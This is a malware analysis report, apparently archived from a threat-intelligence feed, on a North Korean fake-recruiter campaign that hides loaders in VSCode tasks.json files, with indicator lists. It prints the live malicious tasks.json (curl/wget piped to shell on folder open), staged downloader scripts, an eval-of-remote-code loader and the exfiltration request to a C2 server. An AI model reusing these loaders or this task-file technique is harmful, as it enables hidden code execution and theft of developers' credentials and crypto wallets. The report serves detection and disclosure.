{ "id": "e733e351-2507-4dbe-8e69-498f0b5c54e5", "created_at": "2026-04-06T00:15:01.916371Z", "updated_at": "2026-04-10T03:38:19.908753Z", "deleted_at": null, "sha1_hash": "f5d2a4fefd726cf1f371446b00cc2bad32e15737", "title": "Latest Contagious Interview malware campaign abuses Microsoft VSCode Tasks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1281539, "plain_text": "Latest Contagious Interview malware campaign abuses Microsoft\r\nVSCode Tasks\r\nBy OpenSourceMalware.com\r\nPublished: 2025-11-29 · Archived: 2026-04-05 22:04:59 UTC\r\nThe OSM team is very familiar with the North Korean DPRK “Contagious Interview” campaign and there are\r\nmany samples from this malware family in the OpenSourceMalware database.\r\nHowever, in this case, the initial infection vector was different from other Lazurus Group and Contagious\r\nInterview examples we've seen: This new version uses a novel infection technique. Instead of ClickFix, this\r\ncampaign uses Microsoft Visual Studio Code tasks files to infect the victim computer and create persistence. This\r\nwas new.\r\nAll of the attack chain components involved have been added to OpenSourceMalware's database and 100% of that\r\ndata is available to the public for free. We have also reached out to Vercel, GitHub and Atlassian and asked them\r\nto remove all these resources.\r\nAttack Chain Chronology\r\nThe contagious interview campaign targets software engineers, and there are two common targeting scenarios:\r\nA software engineer is targeted on LinkedIn by someone claiming to be a recruiter. They are typically\r\ntargeted because they work for a crypto company or have some connection to the crypto industry. A fake\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 1 of 20\n\nrecruiter reaches out with a high paying opportunity to entice the developer to take their lure.\r\nA software engineer is targeted because they work on many projects at the same time and for many clients.\r\nIn this version, the victim is approached on Upwork, Fiverr or other freelancing websites by someone\r\npretending to want to hire them for a new project.\r\nIn either scenario above, the threat actor will ask the victim to git clone a repository from Bitbucket, GitLab or\r\nGitHub. With this latest version of the “contagious interview” campaign, the threat actor will then ask the victim\r\nto “take a look at the code” so the victim can identify issues in the application and suggest fixes.\r\nMalware is leveraging VSCode Tasks\r\nWhen the victim clones the repo two files are included in the .vscode directory: settings.json and tasks.json. The\r\nsecond file, tasks.json is a Microsoft VSCode tasks file:\r\n./petshop/.vscode\r\n├── settings.json\r\n└── tasks.json\r\nVisual Studio Code tasks let users integrate external tools and automate workflows directly in the editor. These\r\ntasks enable running scripts, starting processes, and executing commands—all without leaving VS Code or\r\nopening a separate command line. This tasks file delivers the first stage of the malware, and also creates\r\npersistence. This is enabled by the runOptions property in the tasks file. Persistence is achieved as that property\r\nis set to runOn: folderOpen in the tasks file so each time the user opens that file, or any other file in that\r\ndirectory, the tasks will run as you can see here:\r\n{\r\n \"version\": \"1.0.0\",\r\n \"tasks\": [\r\n {\r\n \"label\": \"env\",\r\n \"type\": \"shell\",\r\n \"osx\": {\r\n \"command\": \"curl 'https://vscode-setup[.]vercel[.]app/settings/mac?flag=1 | sh\"\r\n },\r\n \"linux\": {\r\n \"command\": \"wget -qO- 'https://vscode-setup[.]vercel[.]app/settings/linux?flag=1' | sh\"\r\n },\r\n \"windows\": {\r\n \"command\": \"curl https://vscode-setup[.]vercel[.]app/settings/windows?flag=1 | cmd\"\r\n },\r\n \"problemMatcher\": [],\r\n \"presentation\": {\r\n \"reveal\": \"never\",\r\n \"echo\": false,\r\n \"focus\": false,\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 2 of 20\n\n\"close\": true,\r\n \"panel\": \"dedicated\",\r\n \"showReuseMessage\": false\r\n },\r\n \"runOptions\": {\r\n \"runOn\": \"folderOpen\"\r\n }\r\n }\r\n ],\r\n}\r\nA novel infection technique\r\nIf the victim opens the source code in Microsoft Visual Studio Code they will get prompted once to trust the\r\nauthors of the files in the repo:\r\nThis is the initial infection vector. Once the victim trusts the authors, they won't be prompted again. This is critical\r\nbecause the task file executes every time the user opens VSCode or any file in the repository—this is how the\r\nthreat actor maintains persistence. This is a pretty ingenious way to install the malware loader, and create\r\npersistence. We didn't realize that VSCode had this ability to automate functions in the IDE, and while we\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 3 of 20\n\nunderstand how that could be attractive to developers, we wonder if Microsoft really thought it through. We\r\nsuspect that this vector will quickly supplant ClickFix as the initial infection vector of choice for Lazarus Group.\r\nIt turns out that other researchers had theorized that VSCode Tasks could be weaponized. In September\r\noasis.security wrote a blog post about this in relation to teams using Cursor and other AI agents. And back in June\r\na researcher named SaadAhla created a PoC taking advantage of VSCode task files. Thanks to Rami McCarthy\r\nand Ax Sharma for for their help here.\r\nBack to the payload: The commands in the tasks.json file will download a loader script specific to to the operating\r\nsystem of the compromised victim. The malware has payloads for MacOS, Linux or Microsoft Windows. Here’s\r\nthe Linux version of that secondary loader:\r\n#!/bin/bash\r\nset -e\r\necho \"Authenticated\"\r\nTARGET_DIR=\"$HOME/.vscode\"\r\nclear\r\nwget -q -O \"$TARGET_DIR/vscode-bootstrap.sh\" \"http://vscode-setup.vercel.app/settings/bootstraplinux?flag=1\"\r\nclear\r\nchmod +x \"$TARGET_DIR/vscode-bootstrap.sh\"\r\nclear\r\nnohup bash \"$TARGET_DIR/vscode-bootstrap.sh\" \u003e /dev/null 2\u003e\u00261 \u0026\r\nclear\r\nexit 0\r\nWhen the bootstrap file is downloaded and run, it immediately downloads two more files, package.json and env-setup.js, and saves them in the users home directory. The env-setup.js file has the third loader:\r\nUSER_HOME=\"$HOME/.vscode\"\r\nmkdir -p \"${USER_HOME}\"\r\nBASE_URL=\"http://vscode-setup.vercel.app\"\r\necho \"[INFO] Downloading env-setup.js and package.json...\"\r\nif ! command -v curl \u003e/dev/null 2\u003e\u00261; then\r\n wget -q -O \"${USER_HOME}/env-setup.js\" \"${BASE_URL}/settings/env?flag=1\"\r\n wget -q -O \"${USER_HOME}/package.json\" \"${BASE_URL}/settings/package\"\r\nelse\r\n curl -s -L -o \"${USER_HOME}/env-setup.js\" \"${BASE_URL}/settings/env?flag=1\"\r\n curl -s -L -o \"${USER_HOME}/package.json\" \"${BASE_URL}/settings/package\"\r\nfi\r\nThe env-setup.sh file downloads a fourth loader script:\r\nconst axios = require('axios');\r\nconst host = \"ip-api-check-nine.vercel.app\";\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 4 of 20\n\nconst apikey = \"3aeb34a31\";\r\naxios\r\n .get(\r\n `https://ip-api-check-nine.vercel.app/icons/701`,\r\n { headers: { \"bearrtoken\": \"logo\" } },\r\n )\r\n .then((response) =\u003e {\r\n eval(response.data);\r\n return response.data;\r\n })\r\n .catch((err) =\u003e {\r\n return false;\r\n });\r\nWhen that env-setup script is executed it downloads a fifth file, which is a large obfuscated JavaScript file. This\r\nfile is the BeaverTail Type 701 variant malware.\r\nCryptostealer component\r\nThis version of BeaverTail targets at least 43 different crypto related browser extensions for exfiltration including:\r\nMetaMask (Ethereum) - nkbihfbeogaeaoehlefnkodbefgpgknn\r\nPhantom (Solana) - bfnaelmomeimhlpmgjnjophhpkoljnlb\r\nCoinbase Wallet - hnfanknocfeofbddgcijnmhnfnkdnaad\r\nBinance Chain - fhbohimaelbohpjbbldcngcnapndodjp\r\nTronLink (Tron) - ibnejdfjmmkpcnlpebklmnkoeoihofec\r\nRonin Wallet (Axie Infinity) - fnjhmkhhmkbjkkabndcnnogagogbneec\r\nTrust Wallet - egjidjbpglichdcondbcbdnbeeppgdph\r\nExodus Web3 - aholpfdialjgjfhomihkjbmgjidlcdno\r\nOKX Wallet - mcohilncbfahbmgdjkbpemcciiolgcge\r\nMath Wallet - afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nAnd 33+ additional wallets\r\nThe crypto stealer also targets several crypto wallet providers:\r\nExodus - Full wallet directory (all currencies)\r\nSolana CLI - ~/.config/solana/id.json keypair file\r\nThe BeaverTail malware also steals login credentials, Session cookies (for account takeover, LocalStorage data,\r\nLevelDB databases ( .ldb files), and MacOS keychain databases.\r\nThe malware specifically targets several browsers including Google Chrome, Brave, Opera and Firefox. This\r\nBeaverTail variant compresses exfiltrated data using zip -r and then exfiltrates it all to an IP address:\r\nPOST \u003chttp://146.70[.]41[.]188:1224/uploads\u003e\r\nContent-Type: multipart/form-data\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 5 of 20\n\n{\n type: \"7\",\n htype: \"\",\n identifier: \"\",\n gtype: \"701\",\n files: [/* stolen file streams */]\n}d\nThere also appears to be a second C2 mentioned in some of the Beavertail samples that will use\napi[.]npoint[.]io/96979650 as a backup. This is not surprising as we have seen Lazarus Group use npoint.io\nfor months now.\n“Invisible Ferret” Python malware\nThe malware then downloads the python based Invisible Ferret from\nhttp://146.70[.]41[.]188:1224/client/7/701\nThis Python file operates as a highly sophisticated multi-stage malware dropper that leverages extreme\nobfuscation to evade detection and analysis. At its core, the malware employs 64 nested layers of obfuscation,\nwhere each layer combines reverse base64 encoding with zlib compression. This creates an onion-like structure\nthat must be peeled back one layer at a time, with each layer using a lambda function to reverse the payload string,\ndecode it from base64, decompress it with zlib, and execute the result. This technique forces analysts to manually\ndecode each layer in sequence, as automated tools struggle with the computational complexity and memory\nrequirements of processing so many nested transformations. The obfuscation serves dual purposes: it defeats\nsignature-based detection systems that rely on static pattern matching, and it significantly increases the time and\nresources required for manual analysis.\nWe got five layers deep manually before we decided to stuff it and asked Claude to write a function to decode the\nPython payload.\nOnce the obfuscation layers are decoded in memory, the core payload performs sophisticated environmental\ndetection and multi-stage payload delivery. The malware first identifies the victim's operating system (Windows,\nMacOS, or Linux) and creates a hidden directory at ~/.n2/ in the user's home folder. It then contacts a\ncommand-and-control (C2) server at 146.70[.]41[.]188:1224 using unencrypted HTTP to download two\nseparate payloads: a primary backdoor component ( /payload/ ) and a browser credential stealer ( /brow/ ).\nThese files are saved as way and pow respectively within the hidden directory.\nThe malware is sneaky, and employs platform-specific stealth techniques, such as creating hidden windows on\nWindows systems using subprocess flags and using abnormal exit codes on macOS to evade detection heuristics.\nCommand and Control (C2)\nThe Python malware communicates with an IP address 146.70[.]41[.]188 that according to Shodan is a\nWindows server hosted by M247 in New York. That IP address is a known DPRK C2 server and is listed on\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\nPage 6 of 20\n\nMaltrail's known Lazarus Group IP list\r\nMultiple versions of this campaign\r\nWe have identified 13 different versions of this campaign spread across 27 different GitHub users, and 11 different\r\npayloads. This campaign uses some fairly convincing \"code puppet\" accounts, but if you look closer you can\r\nidentify they're synthetic.\r\nEach of the 13 different variants is served from a GitHub or Bitbucket repository. All versions of this new variant\r\nuse Microsoft Visual Studio Code Tasks file. These files are stored in the repository at .vscode/tasks.json and are\r\nexecuted any time a file in that directory are opened by VSCode. Each tasks.json file calls a Vercel URL that's\r\ncustom for each variant. The threat actors have designed a system that can deliver different payloads based on a\r\nparameter passed in the URL.\r\nSo for example, for variant one uses vscode-setup[.]vercel[.]app/settings/linux?flag=6 for its stage one loader.\r\nVariant three uses vscode-config[.]vercel[.]app/task/linux?token=812. Variant five uses isvalid-region[.]vercel[.]app/settings/linux?flag=8.\r\nAdditionally, each of the 11 different payloads downloads a different version of the BeaverTail JavaScript\r\nmalware. We have deobfuscated multiple versions of the BeaverTail payload, and so far they seem to use the same\r\nInvisible Ferret Python payload. We continue to work on collecting and cataloging all the malware samples.\r\nOur analysis confirms that while the threat actors used the VSCode tasks technique as far back as April 2025, it\r\nwasn't until two weeks ago that they started using this technique in earnest. This is underscored by the fact that the\r\nthreat actors modified existing older GitHub repositories to use this new infection vector.\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 7 of 20\n\nIt's possible that the earlier ClickFix version of the initial infection vector was becoming less effective, or perhaps\r\nthis new evolution of \"contagious interview\" is just criminals forking and evolving their techniques. Regardless,\r\nwe suspect that the VSCode tasks file technique will become more popular.\r\nSome of the variants below use a different C2 to pull the Python files. This URL pulls the complete python source\r\ncode in one zip file: wget -O p.zip http://45.140.167[.]218:1224/pdown\r\nVariant zero - April 22, 2025 - Unique Identifier: token=99\r\ngithub.com/MentarisHub121/TokenPresaleApp\r\nNotes:\r\nThis repository predates variant one by one day, however, it has no git commit history.\r\nGitHub Users:\r\nyosket\r\nEmail Addresses:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant one - April 23, 2025 - Unique Identifier: token=99\r\ngithub.com/ChainspaceHub/TokenPresaleApp\r\nNotes:\r\nThis is the second oldest repository in the group and the .vscode/tasks.json file existed in the repo going all the\r\nway back to April, 2025. This repository was under active development between April and July 2025 with 411\r\ncommits. As far as we can tell, this is the first time that Lazarus Group used VSCode task files.\r\nGitHub Users:\r\nChainspaceHub\r\nnikkhielseath\r\nyosket\r\nameeetgaikwad\r\nEmail Addresses:\r\nameeetgaikwad \u003camitmanojgaikwad@gmail[.]com\u003e\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 8 of 20\n\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant two - June 5, 2025 - Unique Identifier: flag=6\r\ngithub.com/CapsuleLabs-lgtml/Coin-ICO\r\nNotes:\r\nThis is the third oldest variant by repo age, but it appears as though this was a older contagious interview variant,\r\nbut the tasks.json file was added two weeks ago.\r\nGitHub Users:\r\nCapsuleLabs-lgtml\r\nCapsuleLabs-lgtm\r\nEmail Associated:\r\nCapsuleLabs-lgtml \u003cjohnbiril510@gmail[.]com\u003e\r\nCapsuleLabs-lgtm \u003ccapcapsule3@gmail[.]com\u003e\r\nDomains:\r\nvscode-setup[.]vercel[.]app\r\nFile Hashes:\r\n869bce2efa60b60dab1e0fe8c9d94cfbd6476f4393f79564c4de26ec689dc64d ./beavertail\r\nVariant three - August 6, 2025 - Unique Identifier: token=812\r\ngithub.com/Gerome125/TokenPresale-dApp\r\nNotes:\r\nThis repository is different than the others as it has active development going on by at least 3 of the code puppets\r\ninvolved in this campaign. There are 411 commits so far in this repo which leads us to believe this is the root\r\nrepository that the threat actors are using. Most of the other repos in this campaign have less than ten commits.\r\nGitHub Users:\r\nGerome125\r\nnikkhielseath\r\nyosket\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 9 of 20\n\ndannythedawger\r\nBogdanHabic\r\nEmails Associated:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\ndannythedawger \u003cdaniel.c.daniil@gmail[.]com\u003e\r\nBogdanHabic bogdan@tenderly.co\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant four - August 24, 2025 - Unique Identifier: flag=2\r\ngithub.com/softwareRoom1/skill-test\r\nNotes:\r\nThis is a child repo and has one commit from August 24.\r\nGitHub Users:\r\nbalocones\r\nsoftwareRoom1\r\nEmail Addresses:\r\nbalocones \u003ciandavies2313@gmail[.]com\u003e\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nVariant five - September 8, 2025 - Unique Identifier: flag=307\r\ngithub.com/markomilivojevic/ethvault_staking\r\nNotes:\r\nThis is a child repo and has two commits from September 8 and November 10, 2025.\r\nGitHub Users:\r\nm/markomilivojevic\r\nJames Smith\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 10 of 20\n\nEmail Addresses:\r\nJames Smith \u003cellisfleming574@gmail[.]com\u003e\r\nMarko Milivojevic \u003cmilivojemarko@gmail[.]com\u003e\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant six - September 8, 2025 - Unique Identifier: flag=6\r\ngithub.com/DAP2506/thirdweb-skill-test\r\nNotes:\r\nThis is a secondary repository and has 4 commits between October 21 and November 10, 2025.\r\nGitHub Users:\r\nDAP2506\r\nyenthanh\r\nEmail Addresses:\r\nDAP2506 \u003cdapanchal2506@gmail[.]com\u003e\r\nyenthanh \u003cphamminh1309@gmail[.]com\u003e\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nFile Hashes:\r\nebfaff5c2e9b709c1337e06a756f7ee69fc29d319a27adaafe73eb84d8a43b61 ./beavertail\r\nVariant seven - September 9, 2025 - Unique Identifier: flag=1\r\ngithub.com/megaorg42/CoinLocatorDemo\r\nNotes:\r\nThis repo appears to be the parent repository for several of the variants as it currently has 211 commits, although it\r\nhasn't been active in three weeks.\r\nGitHub Users:\r\nmegaorg42\r\nnikkhielseath\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 11 of 20\n\nyosket\r\nEmails Associated:\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant eight - September 9, 2025 - Unique Identifier: flag=8\r\ngithub.com/Ambition-lead/linkfi\r\nNotes:\r\nThis repo appears to be the parent for several of the variants as it has 356 commits but has been inactive for a\r\nmonth.\r\nGitHub Users:\r\nAmbition-lead\r\nnikkhielseath\r\nyosket\r\ndannythedawger\r\nameeetgaikwad\r\nEmail Addresses:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nameeetgaikwad \u003camitmanojgaikwad@gmail[.]com\u003e\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\ndannythedawger \u003cdaniel.c.daniil@gmail[.]com\u003e\r\nDomains:\r\nisvalid-region[.]vercel[.]app\r\nVariant nine - September 30, 2025 - Unique Identifier: flag=5\r\ngithub.com/SmartPay24/Demo\r\nNotes:\r\nThis repo was only recently added on September 30, and has two commits: On Sept 30 and November 10, 2025.\r\nGitHub Users:\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 12 of 20\n\nsmartpayauthor\r\nSmartPay24\r\nEmail Addresses:\r\nsmartpayauthor smartpay@smart.com\r\nsmartpayauthor \u003csmartpayauthor@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant ten - November 11, 2025 - Unique Identifier: flag=1\r\np_e_t-admin@bitbucket[.]org/p_e_t\r\nNotes:\r\nThis is the only repository we've identified that uses Bitbucket, however we've seen an overall increase in the use\r\nof Bitbucket by Lazarus Group.\r\nEmail Associated:\r\nstrong \u003cstrong.business.info@gmail[.]com\u003e\r\nDomains:\r\nvscode-setup[.]vercel[.]app\r\nFile Hashes:\r\n54a5c5cb16bdd482bd4147200557d3a94e413f9e9aebbf4818e76f16331bc6dc ./beavertail\r\nVariant eleven - November 13, 2025 - Unique Identifier: token=104\r\ngithub.com/winterteam03311/apom\r\ngithub.com/tinitachodos/apom22\r\ngithub.com/tinitachodos/apom\r\nNotes:\r\nThese repos are all child repos and have 1 commit each from November 13, 2025. Unliked most of the other\r\nrepositories in this campaign these repos don't include the contracts folder and the GitHub accounts look like\r\nthrow away accounts.\r\nGitHub Users:\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 13 of 20\n\nLuckystar483\r\nwinterteam03311\r\ntinitachodos\r\nEmail Addresses:\r\nlucafan8973 \u003cferexmoto6@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant twleve - November 13, 2025 - Unique Identifier: flag=301\r\ngithub.com/AbdullahSalihOner/golden-task\r\nNotes:\r\nThis GitHub user almost appears real at first glance, but then upon closer inspection it feels fake. The user owns\r\n83 repos, but many of them appear to be quickly generated with very few files and only one commit.\r\nGitHub Users:\r\nAbdullahSalihOner\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant thirteen - November 21, 2025 - Unique Identifier: flag=4\r\ngithub.com/MahnoorKhushbakht/test-assesment\r\nNotes:\r\nThis is one of the child repos and has 11 commits all from November 21, 2025.\r\nGitHub Users:\r\nMahnoorKhushbakht\r\nEmmanuel-bot-rgb\r\nmahnoor\r\nEmail Addresses:\r\nEmmanuel-bot-rgb \u003cpe699674@gmail[.]com\u003e\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 14 of 20\n\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\ntest-assesment-self[.]vercel[.]app\r\nFile hash:\r\n87e7f4ac95f090f9965175935955fdc02bee4b1bf417855bc65ff4bde9f271e5 ./beavertail\r\nVariant fourteen - September 18, 2025 (suspicious) - Unique Identifier: flag=1\r\ngithub.com/prahaladbelavadi/CoinLocatorDemo\r\nNotes:\r\nThis repo looks like it was published September 18, 2025, but here's the thing: This repo hasn't come up in any of\r\nour searches before, but today, suddenly we can find it with GitHub search. This leads us to believe that the git\r\ncommit dates were faked. This means we can't trust the GitHub timeline for this GitHub repo.\r\nGitHub Users:\r\nprahaladbelavadi\r\nnikkhielseath\r\nyosket\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant fifteen - December 1, 2025 - Unique Identifier: flag=302\r\ngithub.com/eferos93/test4\r\nNotes:\r\nThis repo was published today December 1, 2025\r\nGitHub Users:\r\neferos93\r\nandrew_watson\r\nkoinos-finance\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 15 of 20\n\nVariant sixteen - November 17, 2025 - Unique Identifier: flag=6\r\ngithub.com/shangesh-tech/thirdweb_testing\r\nNotes:\r\nThis repo was published November 17, 2025.\r\nGitHub Users:\r\nshangesh-tech\r\nEmail Addresses:\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nVariant seventeen - November 26, 2025 - Unique Identifier: flag=307\r\ngithub.com/jpoullet2000/ethvault_staking_project\r\nNotes:\r\nThis repo was published November 26, 2025\r\nGitHub Users:\r\njpoullet2000\r\nJames Smith\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant eighteen - November 26, 2025 - Unique Identifier: flag=307\r\ngithub.com/ihzhatamamy/-MagicDoor_Property_Rental\r\nNotes:\r\nThis repo was published November 23, 2025\r\nGitHub Users:\r\nihzhatamamy\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 16 of 20\n\nJames Smith\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nLazarus Group loves hosting payloads on Vercel\r\nDPRK threat actors have flocked to Vercel, and are now using it almost exclusively. We don't know why, but\r\nContagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.\r\nWe have reached out to Vercel and asked them to take down these endpoints. We will report back here on their\r\nresponse.\r\nIndicators of compromise\r\nIP addresses:\r\n146.70[.]41[.]188\r\nGitHub Users\r\nAbdullahSalihOner # potential compromised user\r\nAmbition-lead\r\nBogdanHabic\r\nCapsuleLabs-lgtm\r\nCapsuleLabs-lgtml\r\nChainspaceHub\r\nDAP2506\r\nEmmanuel-bot-rgb\r\nGerome125\r\nJames Smith\r\nLuckystar483\r\nMahnoorKhushbakht\r\nSmartPay24\r\nameeetgaikwad\r\nbalocones\r\ndannythedawger\r\nmarkomilivojevic\r\nmegaorg42\r\nnikkhielseath\r\nsmartpayauthor\r\nsoftwareRoom1\r\nwinterteam03311\r\nyenthanh\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 17 of 20\n\nyosket\r\ntinitachodos\r\nwinterteam29879\r\nmahnoor\r\nMentarisHub121\r\nprahaladbelavadi\r\neferos93\r\nEmails:\r\nbogdan@tenderly.co\r\n64440843+AbdullahSalihOner@users.noreply.github.com\r\namitmanojgaikwad@gmail[.]com\r\ndaniel.c.daniil@gmail[.]com\r\ndapanchal2506@gmail[.]com\r\nellisfleming574@gmail[.]com\r\nferexmoto6@gmail[.]com\r\niandavies2313@gmail[.]com\r\nmilivojemarko@gmail[.]com\r\npe699674@gmail[.]com\r\nphamminh1309@gmail[.]com\r\nsethnikhil74@gmail[.]com\r\nsmartpay@smart.com\r\nsmartpayauthor@gmail[.]com\r\nyosket87@gmail[.]com\r\nDomains/URLs:\r\napi.npoint.io/96979650\r\nvscode-setup[.]vercel[.]app\r\nip-api-check-nine[.]vercel[.]app\r\ntest-assesment-kk37hvtef-mahs-projects-03bae667[.]vercel[.]app\r\nvscode-load-config[.]vercel[.]app\r\nvscode-helper171[.]vercel[.]app\r\nisvalid-region[.]vercel[.]app\r\nvscode-config[.]vercel[.]app\r\nvscode-bootstrapper[.]vercel[.]app\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 18 of 20\n\ntest-assesment-self[.]vercel[.]app\r\nGit repositories\r\nWe found these with this search on GitHub: path:.vscode/tasks.json vercel.app\r\np_e_t-admin@bitbucket[.]org/p_e_t\r\ngithub.com/CapsuleLabs-lgtml/Coin-ICO\r\ngithub.com/Gerome125/TokenPresale-dApp\r\ngithub.com/megaorg42/CoinLocatorDemo\r\ngithub.com/Ambition-lead/linkfi\r\ngithub.com/MahnoorKhushbakht/test-assesment\r\ngithub.com/winterteam03311/apom\r\ngithub.com/AbdullahSalihOner/golden-task\r\ngithub.com/ChainspaceHub/TokenPresaleApp\r\ngithub.com/SmartPay24/Demo\r\ngithub.com/softwareRoom1/skill-test\r\ngithub.com/markomilivojevic/ethvault_staking\r\ngithub.com/DAP2506/thirdweb-skill-test\r\ngithub.com/MentarisHub121/TokenPresaleApp\r\nThese four do not deliver the .vscode/tasks.json file but are implicated in the campaign\r\ngithub.com/tinitachodos/apom22\r\ngithub.com/tinitachodos/apom\r\ngithub.com/winterteam29879/apom\r\ngithub.com/Luckystar483/QuickShop\r\ngithub.com/prahaladbelavadi/CoinLocatorDemo\r\nNPM packages\r\nreact-svg-plugin\r\nreact-svg-config\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 19 of 20\n\nFile hashes\r\n87e7f4ac95f090f9965175935955fdc02bee4b1bf417855bc65ff4bde9f271e5 ./beavertail # sample test-assessment\r\n54a5c5cb16bdd482bd4147200557d3a94e413f9e9aebbf4818e76f16331bc6dc ./beavertail # sample petshop\r\n869bce2efa60b60dab1e0fe8c9d94cfbd6476f4393f79564c4de26ec689dc64d ./beavertail # sample Coin-ICO\r\nebfaff5c2e9b709c1337e06a756f7ee69fc29d319a27adaafe73eb84d8a43b61 ./beavertail # sample thirdweb-skill-test ef12b15466255fafda6225a557cce780baa6b1c98adcf111f5564e7b3ecc0e14 ./invisible-ferret.py\r\nAdditional “contagious interview” resources\r\nGitLab article: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nhttps://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2\r\nAdditional technical details\r\nOpenSourceMalware has compiled detailed technical analysis on both BeaverTail and Invisible Ferret files and\r\ntheir associated collateral. If you would like access to this data please contact us HERE\r\nSource: https://opensourcemalware.com/blog/contagious-interview-vscode\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://opensourcemalware.com/blog/contagious-interview-vscode" ], "report_names": [ "contagious-interview-vscode" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", 